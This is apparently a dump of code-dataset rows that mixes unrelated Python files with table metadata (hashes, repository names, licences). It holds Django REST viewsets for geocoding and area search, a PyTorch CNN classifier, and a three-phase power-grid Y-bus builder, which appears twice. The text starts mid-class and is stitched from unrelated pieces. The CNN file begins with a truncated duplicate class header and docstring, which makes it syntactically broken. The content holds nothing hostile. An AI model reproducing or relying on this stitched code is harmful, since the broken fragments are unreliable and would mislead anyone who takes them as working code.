    queryset = models.Postcode.objects.public_all()
    serializer_class = serializers.PostcodeSerializer
    filter_fields = ('post_code',)
    pagination_class = BaseApiPagination
class GeocodeViewSet(viewsets.ViewSet):
    """Resolve a free-form address into coordinates via ``biz.geocode``."""

    def list(self, request, format=None):
        """GET: geocode the ``address`` query parameter and return the result."""
        raw_address = request.GET.get('address', None)
        return Response(biz.geocode(raw_address))
class TargetAreaViewSet(viewsets.ViewSet):
    """Autocomplete-style search over cities, azas and parking lots.

    Returns ``[{'id': <code>, 'label': <name>}, ...]`` — cities first, then
    azas, then parking lots — or an empty list when no term is given.
    """

    def list(self, request, format=None):
        """GET: look up ``search`` as a name prefix (cities/azas) or substring (lots)."""
        search = request.GET.get('search', None)
        area_list = []
        if search:
            # Same order as before: City, Aza (prefix match), ParkingLot (substring).
            matched_querysets = (
                models.City.objects.public_filter(name__startswith=search),
                models.Aza.objects.public_filter(name__startswith=search),
                ParkingLot.objects.public_filter(name__icontains=search),
            )
            for qs in matched_querysets:
                for row in qs.values('code', 'name'):
                    area_list.append({'id': row.get('code'), 'label': row.get('name')})
        return Response(area_list)
class TargetCityViewSet(viewsets.ModelViewSet):
    """City endpoints exposed for target selection; searchable by name."""
    queryset = models.City.objects.public_all()
    serializer_class = serializers.TargetCitySerializer
    filter_backends = [SearchFilter]
    search_fields = ('name',)
class TargetAzaViewSet(viewsets.ModelViewSet):
    """Aza endpoints exposed for target selection; searchable by name."""
    queryset = models.Aza.objects.public_all()
    serializer_class = serializers.TargetAzaSerializer
    filter_backends = [SearchFilter]
    search_fields = ('name',)
class FuriganaViewSet(viewsets.ViewSet):
    """Look up the furigana of a term via ``biz.get_furigana``."""

    def list(self, request, format=None):
        """GET: return ``biz.get_furigana(search)``; an empty dict when no term given."""
        term = request.GET.get('search', None)
        if not term:
            return Response(dict())
        return Response(biz.get_furigana(term))
| 1,149 | 1,213 | 288 |
4626e516ccf59e42c9386b9d54dfa4f38e9c3b45 | 2,491 | py | Python | best_weights/trial2/CNN.py | misoyuri/ML_Project | b82d3573d8a365a2a8b034edf92d7aeda5abfd0f | [
"BSD-2-Clause"
] | null | null | null | best_weights/trial2/CNN.py | misoyuri/ML_Project | b82d3573d8a365a2a8b034edf92d7aeda5abfd0f | [
"BSD-2-Clause"
] | null | null | null | best_weights/trial2/CNN.py | misoyuri/ML_Project | b82d3573d8a365a2a8b034edf92d7aeda5abfd0f | [
"BSD-2-Clause"
] | null | null | null | class HelloCNN(nn.Module):
"""
Simple CNN Clssifier
"""
class HelloCNN(nn.Module):
    """
    Simple CNN classifier.

    Five VGG-style convolution stacks — each a run of 3x3 same-padding convs
    (ReLU after every conv) followed by BatchNorm, a pooling layer and
    Dropout(0.2) — then a two-layer fully-connected head over 500 features.
    Expects single-channel input whose spatial size collapses to 1x1 at the
    head (e.g. 48x48: four /2 max-pools -> 3x3, then AvgPool2d(3) -> 1x1).

    Bug fix: ``num_classes`` was previously ignored (the head hard-coded 7
    outputs); the head now honours it, with the default of 7 preserving the
    old behaviour.
    """

    def __init__(self, num_classes=7):
        """
        :param num_classes: number of output classes (default 7)
        """
        super(HelloCNN, self).__init__()

        def _stack(in_ch, out_ch, n_convs, pool):
            # n_convs 3x3 convs (ReLU each) -> BatchNorm -> pool -> Dropout(0.2)
            layers = [nn.Conv2d(in_ch, out_ch, 3, padding=1), nn.ReLU()]
            for _ in range(n_convs - 1):
                layers += [nn.Conv2d(out_ch, out_ch, 3, padding=1), nn.ReLU()]
            layers += [nn.BatchNorm2d(out_ch), pool, nn.Dropout(0.2)]
            return nn.Sequential(*layers)

        self.conv1 = _stack(1, 48, 2, nn.MaxPool2d(2, 2))
        self.conv2 = _stack(48, 96, 3, nn.MaxPool2d(2, 2))
        self.conv3 = _stack(96, 192, 4, nn.MaxPool2d(2, 2))
        self.conv4 = _stack(192, 384, 4, nn.MaxPool2d(2, 2))
        self.conv5 = _stack(384, 500, 4, nn.AvgPool2d(3))
        self.fc = nn.Sequential(
            nn.Linear(500, 250),
            nn.Linear(250, num_classes),  # bug fix: was hard-coded to 7
        )

    def forward(self, x):
        """Run the conv stacks, flatten, classify; returns log-probabilities."""
        x = self.conv1(x)
        x = self.conv2(x)
        x = self.conv3(x)
        x = self.conv4(x)
        x = self.conv5(x)
        x = x.view(x.size(0), -1)
        x = self.fc(x)
        return F.log_softmax(x, dim=1)
b4d5f8b9de9168b54916b7b72cb30ed041002a0c | 3,382 | py | Python | src/research/three_phase/tests/vectorized_y_bus.py | mzy2240/GridCal | 0352f0e9ce09a9c037722bf2f2afc0a31ccd2880 | [
"BSD-3-Clause"
] | 284 | 2016-01-31T03:20:44.000Z | 2022-03-17T21:16:52.000Z | src/research/three_phase/tests/vectorized_y_bus.py | mzy2240/GridCal | 0352f0e9ce09a9c037722bf2f2afc0a31ccd2880 | [
"BSD-3-Clause"
] | 94 | 2016-01-14T13:37:40.000Z | 2022-03-28T03:13:56.000Z | src/research/three_phase/tests/vectorized_y_bus.py | mzy2240/GridCal | 0352f0e9ce09a9c037722bf2f2afc0a31ccd2880 | [
"BSD-3-Clause"
] | 84 | 2016-03-29T10:43:04.000Z | 2022-02-22T16:26:55.000Z |
from research.three_phase.Engine import *
from scipy.sparse import lil_matrix
np.set_printoptions(linewidth=100000)
def set_sub(A, cols, rows, sub_mat):
    """
    Write a dense sub-matrix into a sparse matrix in place.

    :param A: sparse matrix to modify
    :param cols: array of column indices (size m)
    :param rows: array of row indices (size n)
    :param sub_mat: dense array (size n x m)
    """
    for row, row_values in zip(rows, sub_mat):
        for col, value in zip(cols, row_values):
            A[row, col] = value
def y_bus(circuit: Circuit):
    """
    Vectorized 3-phase Y bus building.

    Builds the branch-bus connectivity matrices (Cf, Ct) and the four branch
    admittance primitives (yff, yft, ytf, ytt) in the 3-phase frame, then
    composes the bus admittance matrix:

        Ybus = Cf' * (yff*Cf + yft*Ct) + Ct' * (ytf*Cf + ytt*Ct)

    :param circuit: Circuit instance
    :return: sparse (3n x 3n) bus admittance matrix.  Bug fix: the matrix was
             previously only printed and the function returned None; it is now
             returned as well so callers can actually use it.
    """
    n = len(circuit.buses)
    m = len(circuit.branches)

    # branch-from / branch-to connectivity (one 3-phase row block per branch)
    Cf = lil_matrix((3 * m, 3 * n))
    Ct = lil_matrix((3 * m, 3 * n))

    # branch admittance primitives
    yff = lil_matrix((3 * m, 3 * m), dtype=complex)
    yft = lil_matrix((3 * m, 3 * m), dtype=complex)
    ytf = lil_matrix((3 * m, 3 * m), dtype=complex)
    ytt = lil_matrix((3 * m, 3 * m), dtype=complex)

    # map each bus object to its positional index
    bus_idx = {elm: k for k, elm in enumerate(circuit.buses)}

    br_ind = np.array([0, 1, 2])
    for k, branch in enumerate(circuit.branches):
        # get the single-phase bus indices
        f_idx = bus_idx[branch.f]
        t_idx = bus_idx[branch.t]

        # expand the bus indices to the n-phase scheme
        f3 = 3 * f_idx + branch.phases_from
        t3 = 3 * t_idx + branch.phases_to

        # expand the branch index to the n-phase scheme
        b3 = 3 * k + br_ind

        # set the connectivity matrices (note that we set the values at
        # (b3[0], f3[0]), (b3[1], f3[1]), (b3[2], f3[2]))
        Cf[b3, f3] = np.ones(3, dtype=int)
        Ct[b3, t3] = np.ones(3, dtype=int)

        # get the four 3x3 primitives of the branch
        A, B, C, D, _, _ = branch.get_ABCD(Sbase=circuit.Sbase)

        # scatter the 3x3 primitives into the big branch-admittance matrices
        set_sub(A=yff, cols=b3, rows=b3, sub_mat=A)
        set_sub(A=yft, cols=b3, rows=b3, sub_mat=B)
        set_sub(A=ytf, cols=b3, rows=b3, sub_mat=C)
        set_sub(A=ytt, cols=b3, rows=b3, sub_mat=D)

    # compose Yf, Yt and Ybus
    yf = yff * Cf + yft * Ct
    yt = ytf * Cf + ytt * Ct
    ybus = Cf.transpose() * yf + Ct.transpose() * yt

    print(ybus.todense())
    return ybus
if __name__ == "__main__":
    # Demo: 3-bus, 3-phase network with one slack generator, one load and two
    # lines sharing the same sequence-impedance type.
    P = np.array([2.5, 2.5, 2.5])
    S = np.array([2+2j, 20+2j, 40+3j])
    b1 = Bus("B1", number_of_phases=3, Vnom=10.0)
    b1.is_slack = True
    b1.add_generator(Generator("", P=P, v=1.0))
    b2 = Bus("B2", number_of_phases=3, Vnom=10.0)
    b2.add_load(LoadSIY("", S, np.zeros_like(S), np.zeros_like(S)))
    b3 = Bus("B3", number_of_phases=3, Vnom=10.0)
    # b3.add_generator(Generator("", P=P*0.5, v=1.0))
    # Sequence impedances per unit length (presumably zero/positive/negative
    # order — confirm against LineTypeSeq); no shunt admittance.
    line_type1 = LineTypeSeq(name="",
                             Z_SEQ=np.array([0.4606 + 1.7536j, 0.1808 + 0.6054j, 0.1808 + 0.6054j])/100,
                             Ysh_SEQ=np.array([0, 0, 0]))
    lne1 = Line("L1", line_type1, bus_from=b1, bus_to=b2, conn_from=[0, 1, 2], conn_to=[0, 1, 2], length=100.0)
    lne2 = Line("L2", line_type1, bus_from=b2, bus_to=b3, conn_from=[0, 1, 2], conn_to=[0, 1, 2], length=10.0)
    circuit_ = Circuit(Sbase=100)
    circuit_.buses.append(b1)
    circuit_.buses.append(b2)
    circuit_.buses.append(b3)
    circuit_.branches.append(lne1)
    circuit_.branches.append(lne2)
    y_bus(circuit=circuit_)
| 29.929204 | 118 | 0.587522 |
from research.three_phase.Engine import *
from scipy.sparse import lil_matrix
np.set_printoptions(linewidth=100000)
def set_sub(A, cols, rows, sub_mat):
    """
    Write a dense sub-matrix into a sparse matrix in place.

    :param A: sparse matrix to modify
    :param cols: array of column indices (size m)
    :param rows: array of row indices (size n)
    :param sub_mat: dense array (size n x m)
    """
    for row, row_values in zip(rows, sub_mat):
        for col, value in zip(cols, row_values):
            A[row, col] = value
def y_bus(circuit: Circuit):
    """
    Vectorized 3-phase Y bus building.

    Builds the branch-bus connectivity matrices (Cf, Ct) and the four branch
    admittance primitives (yff, yft, ytf, ytt) in the 3-phase frame, then
    composes the bus admittance matrix:

        Ybus = Cf' * (yff*Cf + yft*Ct) + Ct' * (ytf*Cf + ytt*Ct)

    :param circuit: Circuit instance
    :return: sparse (3n x 3n) bus admittance matrix.  Bug fix: the matrix was
             previously only printed and the function returned None; it is now
             returned as well so callers can actually use it.
    """
    n = len(circuit.buses)
    m = len(circuit.branches)

    # branch-from / branch-to connectivity (one 3-phase row block per branch)
    Cf = lil_matrix((3 * m, 3 * n))
    Ct = lil_matrix((3 * m, 3 * n))

    # branch admittance primitives
    yff = lil_matrix((3 * m, 3 * m), dtype=complex)
    yft = lil_matrix((3 * m, 3 * m), dtype=complex)
    ytf = lil_matrix((3 * m, 3 * m), dtype=complex)
    ytt = lil_matrix((3 * m, 3 * m), dtype=complex)

    # map each bus object to its positional index
    bus_idx = {elm: k for k, elm in enumerate(circuit.buses)}

    br_ind = np.array([0, 1, 2])
    for k, branch in enumerate(circuit.branches):
        # get the single-phase bus indices
        f_idx = bus_idx[branch.f]
        t_idx = bus_idx[branch.t]

        # expand the bus indices to the n-phase scheme
        f3 = 3 * f_idx + branch.phases_from
        t3 = 3 * t_idx + branch.phases_to

        # expand the branch index to the n-phase scheme
        b3 = 3 * k + br_ind

        # set the connectivity matrices (note that we set the values at
        # (b3[0], f3[0]), (b3[1], f3[1]), (b3[2], f3[2]))
        Cf[b3, f3] = np.ones(3, dtype=int)
        Ct[b3, t3] = np.ones(3, dtype=int)

        # get the four 3x3 primitives of the branch
        A, B, C, D, _, _ = branch.get_ABCD(Sbase=circuit.Sbase)

        # scatter the 3x3 primitives into the big branch-admittance matrices
        set_sub(A=yff, cols=b3, rows=b3, sub_mat=A)
        set_sub(A=yft, cols=b3, rows=b3, sub_mat=B)
        set_sub(A=ytf, cols=b3, rows=b3, sub_mat=C)
        set_sub(A=ytt, cols=b3, rows=b3, sub_mat=D)

    # compose Yf, Yt and Ybus
    yf = yff * Cf + yft * Ct
    yt = ytf * Cf + ytt * Ct
    ybus = Cf.transpose() * yf + Ct.transpose() * yt

    print(ybus.todense())
    return ybus
if __name__ == "__main__":
    # Demo: 3-bus, 3-phase network with one slack generator, one load and two
    # lines sharing the same sequence-impedance type.
    P = np.array([2.5, 2.5, 2.5])
    S = np.array([2+2j, 20+2j, 40+3j])
    b1 = Bus("B1", number_of_phases=3, Vnom=10.0)
    b1.is_slack = True
    b1.add_generator(Generator("", P=P, v=1.0))
    b2 = Bus("B2", number_of_phases=3, Vnom=10.0)
    b2.add_load(LoadSIY("", S, np.zeros_like(S), np.zeros_like(S)))
    b3 = Bus("B3", number_of_phases=3, Vnom=10.0)
    # b3.add_generator(Generator("", P=P*0.5, v=1.0))
    # Sequence impedances per unit length (presumably zero/positive/negative
    # order — confirm against LineTypeSeq); no shunt admittance.
    line_type1 = LineTypeSeq(name="",
                             Z_SEQ=np.array([0.4606 + 1.7536j, 0.1808 + 0.6054j, 0.1808 + 0.6054j])/100,
                             Ysh_SEQ=np.array([0, 0, 0]))
    lne1 = Line("L1", line_type1, bus_from=b1, bus_to=b2, conn_from=[0, 1, 2], conn_to=[0, 1, 2], length=100.0)
    lne2 = Line("L2", line_type1, bus_from=b2, bus_to=b3, conn_from=[0, 1, 2], conn_to=[0, 1, 2], length=10.0)
    circuit_ = Circuit(Sbase=100)
    circuit_.buses.append(b1)
    circuit_.buses.append(b2)
    circuit_.buses.append(b3)
    circuit_.branches.append(lne1)
    circuit_.branches.append(lne2)
    y_bus(circuit=circuit_)
| 0 | 0 | 0 |